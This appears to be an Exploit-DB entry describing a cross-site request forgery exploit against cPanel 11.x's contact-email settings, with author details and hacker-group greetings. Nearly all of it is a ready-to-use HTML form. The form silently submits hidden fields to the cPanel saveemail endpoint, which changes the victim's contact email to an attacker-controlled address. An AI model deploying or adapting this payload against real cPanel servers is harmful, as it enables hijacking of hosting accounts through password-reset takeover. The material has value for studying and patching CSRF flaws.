cPanel 11.x - Cross-Site Request Forgery (Edit E-mail)

EDB-ID: 15593
CVE: N/A
Author: Mon7rF
Type: webapps
Platform: PHP
Date: 2010-11-21


# Exploit Title: Cpanel 11.X Edit E-mail Cross Site Request Forgery exploit
# Date: 22 - 10 - 2010
# Author: Mon7rF
# Mail : X0h@msn.com
# Tested on: Windows 7

--------------------------------------------------------------------------------------

<form onsubmit="return do_validate(this.id);" id="mainform" name="mainform"  
action="http://www.site.com:2082/frontend/x3/contact/saveemail.html">

<input id="email"                    name="email"                    type="hidden" value="X0h@msn.com">
<input id="second_email"             name="second_email"             type="hidden" value="">
<input id="notify_disk_limit"        name="notify_disk_limit"        type="hidden" value="1">
<input id="notify_bandwidth_limit"   name="notify_bandwidth_limit"   type="hidden" value="1">
<input id="notify_email_quota_limit" name="notify_email_quota_limit" type="hidden" value="1">

<input type="submit" class="input-button" value="Save">

</form>

--------------------------------------------------------------------------------------

Gr33ts : RENO - Mr.M3x - all Member p0c Team ..